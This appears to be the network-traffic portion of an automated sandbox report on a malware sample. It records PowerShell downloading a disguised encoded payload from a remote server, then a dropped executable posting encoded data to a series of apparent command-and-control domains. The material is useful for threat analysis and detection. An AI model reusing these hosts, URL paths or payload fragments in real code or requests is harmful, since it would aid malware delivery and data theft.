                                                                                                                                                        Dec 5, 2024 05:40:53.822031021 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:54.793346882 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:54.793402910 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:55.208344936 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:55.328377962 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:56.226861954 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:56.346860886 CET80500203.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:56.346950054 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:56.362474918 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:56.482274055 CET80500203.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:57.446429968 CET80500203.33.130.190192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 05:38:04.661436081 CET | 1.1.1.1 | 192.168.2.6 | 0xc089 | No error (0) | res.cloudinary.com | ion.cloudinary.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:38:51.511564016 CET | 1.1.1.1 | 192.168.2.6 | 0xf2e7 | No error (0) | www.inastra.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:09.502908945 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb5 | No error (0) | www.ortenckt.online | ortenckt.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:39:09.502908945 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb5 | No error (0) | ortenckt.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:09.502908945 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb5 | No error (0) | ortenckt.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:24.236234903 CET | 1.1.1.1 | 192.168.2.6 | 0x2fbc | No error (0) | www.ks1x7i.vip | ks1x7i.vip | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:39:24.236234903 CET | 1.1.1.1 | 192.168.2.6 | 0x2fbc | No error (0) | ks1x7i.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:24.236234903 CET | 1.1.1.1 | 192.168.2.6 | 0x2fbc | No error (0) | ks1x7i.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:38.758059978 CET | 1.1.1.1 | 192.168.2.6 | 0x8dc6 | No error (0) | www.aaavvejibej.bond | | 104.21.31.249 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:38.758059978 CET | 1.1.1.1 | 192.168.2.6 | 0x8dc6 | No error (0) | www.aaavvejibej.bond | | 172.67.181.150 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:54.072474003 CET | 1.1.1.1 | 192.168.2.6 | 0x1048 | No error (0) | www.deikamalaharris.info | deikamalaharris.info | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:39:54.072474003 CET | 1.1.1.1 | 192.168.2.6 | 0x1048 | No error (0) | deikamalaharris.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:39:54.072474003 CET | 1.1.1.1 | 192.168.2.6 | 0x1048 | No error (0) | deikamalaharris.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:40:08.781251907 CET | 1.1.1.1 | 192.168.2.6 | 0x30b4 | No error (0) | www.tophcom.online | | 162.213.249.216 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:40:23.865761995 CET | 1.1.1.1 | 192.168.2.6 | 0x18c3 | No error (0) | www.chalet-tofane.net | chalet-tofane.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:40:23.865761995 CET | 1.1.1.1 | 192.168.2.6 | 0x18c3 | No error (0) | chalet-tofane.net | | 62.149.128.40 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:40:38.760780096 CET | 1.1.1.1 | 192.168.2.6 | 0x5e4a | No error (0) | www.healthyloveforall.net | healthyloveforall.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:40:38.760780096 CET | 1.1.1.1 | 192.168.2.6 | 0x5e4a | No error (0) | healthyloveforall.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:40:38.760780096 CET | 1.1.1.1 | 192.168.2.6 | 0x5e4a | No error (0) | healthyloveforall.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:40:53.559170961 CET | 1.1.1.1 | 192.168.2.6 | 0x5ef8 | No error (0) | www.asiapartnars.online | asiapartnars.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:40:53.559170961 CET | 1.1.1.1 | 192.168.2.6 | 0x5ef8 | No error (0) | asiapartnars.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:40:53.559170961 CET | 1.1.1.1 | 192.168.2.6 | 0x5ef8 | No error (0) | asiapartnars.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:41:08.648309946 CET | 1.1.1.1 | 192.168.2.6 | 0xd4 | No error (0) | www.yu12345.xyz | wmnfkj.a.1112dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 05:41:08.648309946 CET | 1.1.1.1 | 192.168.2.6 | 0xd4 | No error (0) | wmnfkj.a.1112dns.com | | 154.82.100.177 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:41:08.648309946 CET | 1.1.1.1 | 192.168.2.6 | 0xd4 | No error (0) | wmnfkj.a.1112dns.com | | 154.82.100.162 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 05:41:23.692137003 CET | 1.1.1.1 | 192.168.2.6 | 0xf034 | No error (0) | www.qmmkl.buzz | | 199.115.230.222 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 172.245.123.3 | 80 | 2872 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:37:57.662452936 CET | 325 | OUT | GET /784/verygreattrafficwithniceworkingskilltobegood.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 172.245.123.3
Connection: Keep-Alive
Dec 5, 2024 05:37:58.770580053 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 04:37:58 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Tue, 03 Dec 2024 15:38:39 GMT
ETag: "25a0a-6285f758c139f"
Accept-Ranges: bytes
Content-Length: 154122
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49759 | 172.245.123.3 | 80 | 5988 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:38:26.956653118 CET | 78 | OUT | GET /784/CAMRRAM.txt HTTP/1.1
Host: 172.245.123.3
Connection: Keep-Alive
Dec 5, 2024 05:38:28.068022966 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 04:38:27 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Tue, 03 Dec 2024 15:32:21 GMT
ETag: "5d2ac-6285f5f04ae50"
Accept-Ranges: bytes
Content-Length: 381612
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                                                                                                                        Data Ascii: DrTXiM+oX2gVguqMy3MTOg5zzI1iaw9KDgk4+N1rEoNpcf7WxDheG2QzkTmIhb/EYxAF2mUlJSegv2mzTNaZxdmA2/59M6luhH9PnNnDl+5Ck8IA7TPHQ/pzKNkA71NZ4aA0TAyXODOAhxfepfa4KRzkuUwDdg0n4zii8wi9B1j3jzDBrJlzQixPL+iZN58QvhkEIDchsS1sP3WK0b5E5wIRoW/C3zR0mX7GLUiWzsoxYtBKeEI
                                                                                                                                                        Dec 5, 2024 05:38:28.068466902 CET1236INData Raw: 4f 58 66 65 62 4b 6a 76 38 52 58 74 57 4a 31 30 4c 66 41 2b 52 4c 66 51 6e 74 68 68 68 64 42 45 48 34 41 6f 33 66 51 6e 71 36 2b 61 61 41 68 33 67 4f 6b 30 67 4e 36 6d 6b 45 72 6a 67 65 41 51 64 34 73 52 57 44 6a 75 59 62 35 55 77 5a 32 45 73 67
                                                                                                                                                        Data Ascii: OXfebKjv8RXtWJ10LfA+RLfQnthhhdBEH4Ao3fQnq6+aaAh3gOk0gN6mkErjgeAQd4sRWDjuYb5UwZ2EsgqvE8qskCrBhsLKGVxtQXdodsmKgGs0NF6NPNdqfZc5RdmPnhs9vIUojk1vUXdfhLZEHPcw2u5vZPOmzyD/NP828B5TxalC23ZWTcSTH5f5kXLxupFxnjsA+BDEd+SsT89PlS2o5vkcbXl9WmZh2IGofESBQQTPtan
                                                                                                                                                        Dec 5, 2024 05:38:28.189172029 CET1236INData Raw: 61 47 56 63 2f 4e 47 67 4b 49 4e 62 69 74 56 61 75 39 48 70 72 47 2f 61 38 64 74 77 67 54 48 73 6a 6d 41 6c 65 42 4a 62 6b 2f 31 77 58 4c 36 73 64 43 58 54 4a 4a 2f 6d 61 44 67 71 2b 2b 59 32 30 55 51 43 55 50 74 54 43 44 62 32 64 49 38 32 51 78
                                                                                                                                                        Data Ascii: aGVc/NGgKINbitVau9HprG/a8dtwgTHsjmAleBJbk/1wXL6sdCXTJJ/maDgq++Y20UQCUPtTCDb2dI82QxXhWUOfJOEWm0f3N6ISicuwjCe357QFHhai5uEIb+Hu9QLgN0dFMAQeIeMjfPZYtVMwhTLtb6FyvdEC8gVK3LnWnxd22V0FN7XNjfM+24aJOOq5fuChWWmaNujM9fgWB2PuENdIBKzsXECR6ocbq8gtmYmpd4Lk1LF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49821 | 208.91.197.27 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:38:51.643821001 CET | 550 | OUT | GET /gbk4/?Jr=tnaxxtx&ZrE=Xcz/lKtmYzaclw33ohiXS7QV/Se8Pq+n4C+TPx5KwIQWTY7xXXdhlW/5Nf4u3/jcsrURWrDv59TKoDO7PIpn/ZUTTTwXyUNiXs6DylNi2YpMPJOOA+G6DJ3d/zRep1m17eaWMwM= HTTP/1.1
                                                                                                                                                        Host: www.inastra.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:38:53.469074011 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:38:52 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                        Set-Cookie: vsid=901vr480919132753898609; expires=Tue, 04-Dec-2029 04:38:52 GMT; Max-Age=157680000; path=/; domain=www.inastra.online; HttpOnly
                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_YvUpfd3Zeiz2XqATRm0coKetJScRAH2HXKDrH1v1kJJuadda9Xp8koTp4d6ZlSRQR8sS3D/dL2mu8ncogAbDdQ==
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49863 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:09.641791105 CET | 818 | OUT | POST /aj1a/ HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ortenckt.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ortenckt.online/aj1a/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49870 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:12.298032999 CET | 842 | OUT | POST /aj1a/ HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ortenckt.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ortenckt.online/aj1a/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49876 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:14.951198101 CET | 1855 | OUT | POST /aj1a/ HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ortenckt.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ortenckt.online/aj1a/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49886 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:17.603600025 CET | 551 | OUT | GET /aj1a/?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:39:18.701617002 CET | 406 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtx"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49903 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:24.369544029 CET | 803 | OUT | POST /dlcs/ HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ks1x7i.vip
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ks1x7i.vip/dlcs/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=944CDof+KArM5pLTCG44vgroTnG/uMbnppQHtUI2dheIWMz/OI0hd+NSOuetnyw8iOnNjeQ8UqRTz1bz+3+CPvIv61R+g9uq8cbdF+/wFuY++y+7HKGqLxb+oNH733xeWfxds9SWgWT65kMD6wL80vP99SUpl6Xbt6fR+/SvZjfhheLVZMQBAYTR9t6LqGa1fKnKvQQnrbNB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49910 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:27.028373003 CET | 827 | OUT | POST /dlcs/ HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ks1x7i.vip
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ks1x7i.vip/dlcs/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=944CDof+KArM6I7TOFA4tArrcHG/lsbZppcHtVMmdS2IRsD/PMAhQeNSBOeSqSw3iOrvjfs8UqFTzwnz+AKFMfItyVRg/tuq8cbdF+6tFug++ii7V7GpCRb/8dH7z3wVWfxrs5yogVr65lQD9ij9/vO2zyVLh5iRspiO/9+fPjbekoKPF/QiSIzT9vi5qmafdKfK9HcAkvoifzpp/Bd/APct1u5ZgMs/gg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49917 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:29.685472965 CET | 1840 | OUT | POST /dlcs/ HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ks1x7i.vip
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ks1x7i.vip/dlcs/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49923 | 3.33.130.190 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:32.336359978 CET | 546 | OUT | GET /dlcs/?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.ks1x7i.vip
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 5, 2024 05:39:33.432655096 CET | 406 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:33 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 266
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtx"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49940 | 104.21.31.249 | 80 | 3992 | C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 05:39:38.892378092 CET | 821 | OUT | POST /j82t/ HTTP/1.1
                                                                                                                                                        Host: www.aaavvejibej.bond
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.aaavvejibej.bond
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.aaavvejibej.bond/j82t/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Ascii: ZrE=Ad+3ASsryumthlKAN1IZLGHpnmJxblc5aIzyaZcHYGt3TXnQBuT7H1ynM+t7I4xMeijTNgVhQ7FID4zJzN82wflg08ahWbODb+1ibAW38Xm/R/g7KvmTxEe1Cx9R0wOjD/6xyE8Be89WI5x7CpKrkj0rF8vMM7w/9XnQ7MTpU83SnajoKBHiHw4sCVuuYHrrgFl8NF2WBMG4
Dec 5, 2024 05:39:40.435516119 CET | 782 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:39:40 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXM4IkSArbVlxTLCNtq5tB56Ve0VaBKfnNSWWlhf0%2FpNZJr2IHo0RnvshSW4bCjGipBe2qBbKC29QXa6odrrn4WDM69W0b66D%2BINpVhl%2BPgNwEFEZH6XRSZVJ370Hk24d%2BV31b%2BEgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8ed15a89de6f0fa8-EWR
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1542&rtt_var=771&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=821&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                        Data Raw: 33 0d 0a 34 30 34 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 34040


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
